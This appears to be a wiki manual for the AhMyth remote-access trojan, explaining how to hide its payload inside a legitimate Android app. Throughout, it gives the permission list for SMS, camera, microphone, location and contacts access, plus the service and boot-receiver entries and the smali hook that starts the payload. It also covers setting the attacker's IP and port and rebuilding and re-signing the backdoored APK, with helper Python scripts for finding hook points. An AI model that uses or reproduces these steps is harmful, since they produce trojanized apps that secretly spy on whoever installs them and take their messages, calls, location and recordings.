
User Manual ‐ Manually Template Original Applications ‐ Activity Based Method

Morsmalleo edited this page Aug 23, 2023 · 30 revisions

Prerequisites

  • Apktool
  • A properly configured, decompiled AhMyth payload
  • Patience


Activity Based Method

  1. Decompile the original application using Apktool. Use whichever form matches your install, the wrapper script or the jar directly; both write the decoded app to a folder named after the APK (original/ here):
apktool d original.apk
java -jar apktool.jar d original.apk

  2. Enter the decompiled application folder and open the AndroidManifest.xml file in an editor such as Visual Studio Code or Sublime Text.

  3. Copy the payload permissions from the "Payload Permissions" dropdown tab below and add them next to the original application's existing <uses-permission> entries (there is no need to repeat a permission the original already declares), then save the file. Follow the dropdown "Help" tab to view an example if you get stuck. Note that a few entries in the list, such as WRITE_SECURE_SETTINGS, are signature-level permissions that a sideloaded app is never granted; declaring them does not stop the app from installing, but do not expect them to take effect.
Payload Permissions
<uses-permission android:name="android.permission.WAKE_LOCK"/>
<uses-permission android:name="android.permission.CAMERA"/>
<uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.MANAGE_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.WRITE_SETTINGS"/>
<uses-permission android:name="android.permission.WRITE_SECURE_SETTINGS"/>
<uses-permission android:name="android.permission.INTERNET"/>
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
<uses-permission android:name="android.permission.READ_SMS"/>
<uses-permission android:name="android.permission.SEND_SMS"/>
<uses-permission android:name="android.permission.RECEIVE_SMS"/>
<uses-permission android:name="android.permission.WRITE_SMS"/>
<uses-feature android:name="android.hardware.camera"/>
<uses-feature android:name="android.hardware.camera.autofocus"/>
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
<uses-permission android:name="android.permission.READ_PHONE_STATE"/>
<uses-permission android:name="android.permission.READ_CALL_LOG"/>
<uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS"/>
<uses-permission android:name="android.permission.READ_CONTACTS"/>
<uses-permission android:name="android.permission.RECORD_AUDIO"/>
<uses-permission android:name="android.permission.MODIFY_AUDIO_SETTINGS"/>
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
<uses-permission android:name="android.permission.ACCESS_BACKGROUND_LOCATION"/>
<uses-permission android:name="android.permission.INSTALL_PACKAGE"/>

ℹ️ Help

Original Manifest Before Payload Permissions Injection

Permissions Injection - Before


Original Manifest After Payload Permissions Injection

The Injected Payload Permissions are Highlighted in Red 🔴

Permissions Injection - After

  4. Copy the payload Service below and add it next to the original application's existing services. If the original manifest declares no services, insert it just before the closing </application> tag instead, then save the file. Follow the dropdown "Help" example for further help. The android:exported="false" attribute is deliberate: nothing outside the app needs to bind to this service, so leave it as it is.
<service android:enabled="true" android:exported="false" android:name="ahmyth.mine.king.ahmyth.MainService"/>
ℹ️ Help

If the manifest contains existing services, insert the payload service just after the original application's last existing service, like so:

Original Manifest With Existing Services, Before Payload Service Injection

Service Injection - Application Tag - Before


Original Manifest With Existing Services, After Payload Injection

The Injected Payload Service is highlighted in Red 🔴 while the application's last existing Service is highlighted in Blue 🔵


If the manifest does not contain any existing services, insert the payload service just before the closing </application> tag, like so:

Original Manifest Without Existing Services, Before Payload Service Injection

Service Injection - Application Tag - Before


Original Manifest Without Existing Services, After Payload Service Injection

The Injected Payload Service is Highlighted in Red 🔴 while the application's closing </application> tag is highlighted in Blue 🔵

Service Injection - Application Tag - After

  5. Copy the payload Receiver below and add it next to the original application's existing receivers. If the original manifest declares no receivers, insert it before the closing </application> tag but after the payload Service you injected in the previous step, then save the file. Follow the dropdown "Help" example for further help. Keep android:exported="true" on the receiver: the BOOT_COMPLETED broadcast is sent by the system, and because the receiver carries an intent filter, an app targeting Android 12 or later must state android:exported explicitly or the APK will not install.
<receiver android:enabled="true" android:exported="true" android:name="ahmyth.mine.king.ahmyth.MyReceiver">
    <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
    </intent-filter>
</receiver>
ℹ️ Help

If the original application's manifest contains existing receivers, then insert the payload receiver just after the application's last existing receiver like so:

Original Manifest With Existing Receivers, Before Payload Receiver Injection

Receiver Injection - Application Tag - Before


Original Manifest With Existing Receivers, After Payload Receiver Injection

The Injected Payload Receiver is highlighted in Red 🔴 while the application's last existing receiver tag is highlighted in Blue 🔵 along with the previously injected payload Service which is highlighted in Green 🟢


If the manifest does not contain any existing receivers, then insert the payload receiver just before the closing </application> tag in the manifest like so:

Original Manifest Without Existing Receivers, Before Payload Receiver Injection

Receiver Injection - Application Tag - Before


Original Manifest Without Existing Receivers, After Payload Receiver Injection

The Injected Payload Receiver is highlighted in Red 🔴 while the closing </application> tag is highlighted in Blue 🔵 along with the previously injected payload Service which is highlighted in Green 🟢

Receiver Injection - Application Tag - After

  6. Locate the name of a suitable class for hook injection. You have three options, to be tried in order:
Option A

Search the manifest for the application's Main Application Class name.

Locate the <application> tag in the manifest; it usually sits just below where the application's permissions are declared.

Once you have found this tag, look for its android:name= attribute, which holds the Main Application Class name together with its package path. This class is the best hook point, because its constructor runs before any activity, service or receiver in the process, whichever entry point the app is launched through.

  • NOTE: If the <application> tag has no android:name attribute, or its value is "android.app.Application", the app uses the framework's base class and there is no smali file to hook; skip this option and move on to Option B.


Option B

If Option A proves unsuitable, search the manifest for the application's Main Launcher Activity class name.

Look for the first <activity> tag that contains an <intent-filter> whose <action> is android.intent.action.MAIN and whose <category> is android.intent.category.LAUNCHER (this filter marks the activity as the entry point shown in the launcher).

Once you have found that <activity> tag, read its android:name= attribute, which holds the Main Launcher Activity class name together with its package path. Keep in mind that a hook placed here only fires when the app is opened through that activity; a process started by a broadcast, a service or a link into another activity will not run it, which is why Option A is preferred when it is available.

  • NOTE: If the android:name= attribute of that <activity> tag is "android.app.Activity", skip this option and proceed to Option C, as this name does not point to a physical file.


Option C

If both Option A and Option B prove unsuitable, search the manifest's activity aliases for a hookable class.

Locate the first <activity-alias> tag and read its android:targetActivity= attribute. An alias is only a second name for a real activity, so one of these targets will point to a physical file.

  • NOTE: Option C can be time consuming for large applications such as social media apps, because the class name and path you extract here is what Step 7 uses to locate the matching *.smali file, and you may have to repeat Option C and Step 7 over several aliases until one resolves to a physical *.smali file. There is no shortcut for this.

  • Click the dropdown "Help" tab for further information and help.
ℹ️ Help
  • A: Main application class name extraction (picture placeholder)

  • B: Main launcher activity class name extraction (picture placeholder)

  • C: Main launcher activity class name extraction from an <activity-alias> (picture placeholder)

  7. After you have extracted the name of a suitable Main Class from the manifest, open PowerShell on Windows, or a terminal on Linux or macOS, and run the appropriate command to locate the *.smali file we need to inject the hook into. Replace path/to/original with the path to the decompiled original application, and Class-Name-Here with the simple class name you extracted from the manifest (the last dotted component; for com.example.app.MainActivity that is MainActivity). Searching from the application root matters because the class may live in any of the smali or smali_classes(X) directories, not necessarily the first one. If the search returns more than one file, pick the one whose directory path matches the package part of the class name. The explicit "." start path in the Linux/macOS command is required by the BSD find that ships with macOS.
  • Windows
set-location "path/to/original"; gci -recurse -filter "Class-Name-Here.smali" -file | resolve-path -relative  
  • Linux & macOS
cd path/to/original; find . -name "Class-Name-Here.smali"
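Steps 6 and 7 done programmatically, as an added example that is not part of AhMyth or Apktool: the script parses an Apktool-decoded AndroidManifest.xml with Python's standard library, applies Options A, B and C in order, turns the resulting class name into the path of its .smali file, and searches every smali*/ directory of the decoded app for it. The embedded manifest is constructed for the example; com.example.victim and its class names are placeholders.

```python
import xml.etree.ElementTree as ET
from pathlib import Path

ANDROID_NS = "http://schemas.android.com/apk/res/android"
A_NAME = "{%s}name" % ANDROID_NS
A_TARGET = "{%s}targetActivity" % ANDROID_NS

# Framework classes named in manifests that have no .smali file inside the app.
FRAMEWORK_CLASSES = {"android.app.Application", "android.app.Activity"}


def qualify(name, package):
    """Expand manifest short forms: '.Main' and 'Main' both mean '<package>.Main'."""
    if name.startswith("."):
        return package + name
    if "." not in name:
        return package + "." + name
    return name


def is_launcher(component):
    """True if an <activity>/<activity-alias> carries a MAIN + LAUNCHER intent filter."""
    for flt in component.findall("intent-filter"):
        actions = {a.get(A_NAME) for a in flt.findall("action")}
        categories = {c.get(A_NAME) for c in flt.findall("category")}
        if "android.intent.action.MAIN" in actions and "android.intent.category.LAUNCHER" in categories:
            return True
    return False


def hook_class(manifest_xml):
    """Apply Options A, B and C in order; return (option, qualified class) or (None, None)."""
    root = ET.fromstring(manifest_xml)
    package = root.get("package", "")
    app = root.find("application")
    if app is None:
        return None, None

    # Option A: the custom Application subclass, if the app declares one.
    app_name = app.get(A_NAME)
    if app_name and qualify(app_name, package) not in FRAMEWORK_CLASSES:
        return "A", qualify(app_name, package)

    # Option B: the first activity with a MAIN/LAUNCHER filter.
    for act in app.findall("activity"):
        if is_launcher(act) and act.get(A_NAME):
            name = qualify(act.get(A_NAME), package)
            if name not in FRAMEWORK_CLASSES:
                return "B", name
            break  # only the first launcher activity counts

    # Option C: follow an <activity-alias> to the real activity it targets,
    # preferring an alias that is itself the launcher entry point.
    aliases = app.findall("activity-alias")
    for alias in [a for a in aliases if is_launcher(a)] + aliases:
        target = alias.get(A_TARGET)
        if target:
            return "C", qualify(target, package)
    return None, None


def smali_relpath(class_name):
    """'com.example.app.Main' -> 'com/example/app/Main.smali' (what step 7's find looks for)."""
    return class_name.replace(".", "/") + ".smali"


def locate_smali(app_dir, class_name):
    """Every smali*/ path holding the class; normally exactly one, empty if missing."""
    pattern = "smali*/" + smali_relpath(class_name)
    return sorted(p for p in Path(app_dir).glob(pattern) if p.is_file())


# Constructed sample manifest (not from a real app): no custom Application class,
# so Option A fails and Option B picks the launcher activity.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.victim">
    <uses-permission android:name="android.permission.INTERNET"/>
    <application android:name="android.app.Application" android:label="Victim">
        <activity android:name=".SplashActivity" android:exported="true">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
        <activity android:name="com.example.victim.MainActivity"/>
    </application>
</manifest>
"""

if __name__ == "__main__":
    option, cls = hook_class(SAMPLE_MANIFEST)
    print(option, cls, "->", smali_relpath(cls))
```

hook_class reports which option succeeded as well as the class, so you can tell whether the hook will run for every entry point (Option A) or only when the launcher activity is opened (Options B and C). locate_smali searches from the application root, so it also finds classes that Apktool placed in smali_classes2 or a later directory.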

  8. Once you have located the application's main class smali file, open it in a text editor.

  9. Now we need to insert our Payload Hook so the payload starts as soon as the original application starts. Click the dropdown Help tab to see how. MAKE SURE YOU READ THIS PART: manual binding with AhMyth has changed massively since the release of v1.0-BETA.4.
ℹ️ Help
    1. Locate the 1st occurrence of the string return-void (highlighted in Blue). Note the .method line above it so you know which method the hook will land in; it should be one that runs when the app starts, such as the class constructor or onCreate.
Hook Point


    2. Copy the new Static Payload Hook below.
invoke-static {}, Lahmyth/mine/king/ahmyth/MainService;->start()V


    3. Inject the new Static Payload Hook (highlighted in Red) on its own line just before that 1st occurrence of return-void (highlighted in Blue), then save the file. The hook is a static call with an empty register list ({}), so it needs no registers of its own and the method's .locals or .registers directive can stay as it is.
Hook Injection
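A check for this step, as an added example that is not part of AhMyth: given the text of the smali file, it reports which method contains the first return-void (the line the hook goes before) and whether the hook is already in place directly above it. The smali excerpt is constructed for the example, with placeholder class and method bodies; the hook line is the one from this page.

```python
# The static hook from this page: AhMyth's own MainService entry point.
HOOK = "invoke-static {}, Lahmyth/mine/king/ahmyth/MainService;->start()V"


def first_return_void(smali_text):
    """Find the first 'return-void' in a smali file.

    Returns (method_header, line_number), where method_header is the text after
    '.method ' on the enclosing method line and line_number is 1-based, or None
    when the file contains no return-void at all.
    """
    method = None
    for lineno, raw in enumerate(smali_text.splitlines(), start=1):
        line = raw.strip()
        if line.startswith(".method "):
            method = line[len(".method "):]
        elif line == ".end method":
            method = None
        elif line == "return-void":
            return method, lineno
    return None


def hook_present(smali_text, hook=HOOK):
    """True if the hook is the line directly above the first return-void."""
    found = first_return_void(smali_text)
    if found is None:
        return False
    lines = smali_text.splitlines()
    index = found[1] - 1  # 0-based index of the return-void line
    return index > 0 and lines[index - 1].strip() == hook


# Constructed smali excerpt standing in for the launcher activity's file;
# the class and method bodies are placeholders, not code from a real app.
SAMPLE_SMALI = """.class public Lcom/example/victim/SplashActivity;
.super Landroidx/appcompat/app/AppCompatActivity;

.method public constructor <init>()V
    .locals 0
    invoke-direct {p0}, Landroidx/appcompat/app/AppCompatActivity;-><init>()V
    return-void
.end method

.method protected onCreate(Landroid/os/Bundle;)V
    .locals 1
    invoke-super {p0, p1}, Landroidx/appcompat/app/AppCompatActivity;->onCreate(Landroid/os/Bundle;)V
    return-void
.end method
"""

if __name__ == "__main__":
    method, lineno = first_return_void(SAMPLE_SMALI)
    print("first return-void is at line %d inside: %s" % (lineno, method))
    print("hook present:", hook_present(SAMPLE_SMALI))
```

Run it against the real file after editing: if the reported method is not one that executes at startup, or hook_present comes back False, the payload will not be started by this class and the hook point needs another look.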

  10. Head into the decompiled APK folder of your AhMyth payload and enter the smali directory.

  11. Copy the payload folders inside the smali directory, excluding the android and androidx folders; these will be copied over later on.

  12. Head back into the decompiled original application we're backdooring and create a new smali_classes(X) directory (where "(X)" refers to the directory's respective numbering). Click the dropdown tab below for more information about creating smali_classes(X) directories appropriately.
ℹ️ Creating "smali_classes(X)" Directories Appropriately

Creating smali_classes(X) directories isn't as hard as it sounds. Apktool decodes each classes(N).dex of the original APK into its own directory and rebuilds each directory back into a dex file of the same number, so a new directory is simply a new dex file for the payload classes to live in.

If the decompiled original application contains only one smali directory, that directory will always be titled "smali" (it corresponds to classes.dex). In that case all we need to do is create a new "smali_classes2" directory and paste our copied AhMyth payload folders into it.

Before

After



If the decompiled original application contains multiple smali directories, then we have a list of smali_classes(X) folders on our hands; you'll notice these directories are numbered.

To create our new payload directory, follow that numbering: create a smali_classes(X) folder numbered one higher than the highest existing smali_classes(X) folder. For example, if the highest existing folder is smali_classes10, create smali_classes11. Compare the numbers numerically rather than by how a file browser sorts the names (smali_classes10 sorts before smali_classes2 alphabetically but is the higher number), and never leave a gap: Android loads classes.dex, classes2.dex, classes3.dex and so on in sequence and stops at the first number that is missing, so a payload placed in a directory past a gap would never be loaded.

Before

After
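The directory numbering rule, as an added example that is not part of AhMyth or Apktool: next_smali_dir takes the names found in the decoded application's top-level folder and returns the name of the directory to create, comparing the numbers numerically and refusing to continue if the existing numbering has a gap. create_payload_dir is a convenience wrapper that creates it. The listings under __main__ are constructed, not taken from a real decode.

```python
import re
from pathlib import Path

# "smali" (classes.dex) or "smali_classes<N>" (classes<N>.dex), nothing else.
SMALI_DIR = re.compile(r"^smali(?:_classes(\d+))?$")


def smali_dir_numbers(names):
    """Dex numbers of the smali directories in a listing; plain 'smali' counts as 1."""
    numbers = []
    for name in names:
        match = SMALI_DIR.match(name)
        if match:
            numbers.append(int(match.group(1)) if match.group(1) else 1)
    return sorted(numbers)


def next_smali_dir(names):
    """Name of the directory to create for the payload: highest existing number plus one.

    Numbers are compared numerically, so smali_classes10 ranks above smali_classes9
    even though a file browser lists it first. A gap in the numbering is an error:
    Android loads classes.dex, classes2.dex, ... in sequence and stops at the first
    missing one, so anything numbered past a gap would never be loaded.
    """
    numbers = smali_dir_numbers(names)
    if not numbers:
        raise ValueError("no smali directory found; is this an Apktool-decoded app?")
    if numbers != list(range(1, numbers[-1] + 1)):
        raise ValueError("smali directories are not contiguous: %s" % numbers)
    return "smali_classes%d" % (numbers[-1] + 1)


def create_payload_dir(app_dir):
    """Create the next smali_classes(X) directory under a decoded app and return its path."""
    app_dir = Path(app_dir)
    names = [p.name for p in app_dir.iterdir() if p.is_dir()]
    target = app_dir / next_smali_dir(names)
    target.mkdir()
    return target


if __name__ == "__main__":
    # Constructed listings, not taken from a real decode.
    print(next_smali_dir(["smali", "res", "original"]))
    print(next_smali_dir(["smali", "smali_classes2", "smali_classes3", "smali_classes4",
                          "smali_classes5", "smali_classes6", "smali_classes7",
                          "smali_classes8", "smali_classes9", "smali_classes10", "res"]))
```

Point create_payload_dir at the decoded application's root (the folder that holds AndroidManifest.xml and the smali directories); it raises rather than guessing if the existing layout does not look like Apktool output.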

  13. Paste the copied AhMyth payload folders into the newly created smali_classes(X) directory.

  14. Head back into the smali folder of your decompiled AhMyth payload and copy the android & androidx folders.

  15. Paste the copied android & androidx folders into the smali folder of the decompiled original application, replacing files if prompted. If the original application ships its own copies of these support classes, replacing them with the payload's versions can change their behaviour, so if the rebuilt app crashes on launch this step is the first thing to revisit.

  16. After copying the android and androidx folders into the smali directory of the decompiled original application, edit the file titled e.smali located at smali_classesX/ahmyth/mine/king/ahmyth (where smali_classesX is the payload directory we created previously for the AhMyth payload files). This file holds the IP:PORT string the payload connects back to; replace it with your own IP address and port number, then save the file.

  17. Close everything (make sure all modifications have been saved) and recompile the backdoored application using Apktool, again using whichever form matches your install:
apktool b original -o Ahmyth.apk
java -jar apktool.jar b original -o Ahmyth.apk

  18. Sign the backdoored application using an APK signer. We recommend Uber APK Signer as it not only signs the payload but also zipaligns it before signing. The first form signs a single APK and writes the result to the output folder; the second signs every APK found in the given folder. Two things to keep in mind: the rebuilt APK is signed with your key rather than the original developer's, so it cannot be installed over an existing installation of the original app (the signature mismatch fails the install) and must go onto a device that does not have the original installed; and it is worth checking the signature before deploying, for example with apksigner verify from the Android SDK build-tools.
java -jar sign.jar -a path/to/Ahmyth.apk -o ~/path/to/output/folder
java -jar sign.jar -a path/to/folder/containing/the/payload